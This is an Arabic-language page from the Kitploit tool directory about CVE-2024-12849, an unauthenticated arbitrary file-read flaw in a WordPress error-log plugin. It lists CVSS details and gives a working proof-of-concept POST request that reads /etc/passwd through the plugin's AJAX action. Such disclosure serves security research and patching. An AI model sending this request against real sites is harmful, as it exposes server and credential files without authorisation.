Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-12849 — Error Log Viewer By WP Guru <= 1.0.1.3 - نقص التفويض يؤدي إلى قراءة ملفات عشوائية بدون مصادقة | Kitploit
أدوات/GitHubGitHub/randomrobbiebf/cve-2024-12849
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلومات
GitHubrandomrobbiebf/cve-2024-12849

CVE-2024-12849

Error Log Viewer By WP Guru <= 1.0.1.3 - نقص التفويض يؤدي إلى قراءة ملفات عشوائية بدون مصادقة

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-12849

Error Log Viewer By WP Guru <= 1.0.1.3 - نقص التفويض لقراءة ملفات تعسفية بدون مصادقة

الوصف

المكوّن الإضافي Error Log Viewer By WP Guru لـ WordPress عرضة لثغرة قراءة الملفات التعسفية في جميع الإصدارات حتى 1.0.1.3 وما يشملها عبر إجراء AJAX wp_ajax_nopriv_elvwp_log_download. وهذا يتيح للمهاجمين غير المصادقين قراءة محتويات ملفات تعسفية على الخادم، والتي قد تحتوي على معلومات حساسة.

التفاصيل

  • النوع: إضافة
  • Slug: error-log-viewer-wp
  • الإصدار المتأثر: 1.0.1.3
  • درجة CVSS: 7.5
  • تقييم CVSS: مرتفع
  • متجه CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • CVE: CVE-2024-12849
  • الحالة: نشط

POC

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 80

action=elvwp_log_download&elvwp_error_log_download=1&elvwp_error_log=/etc/passwd
تنزيل الأداة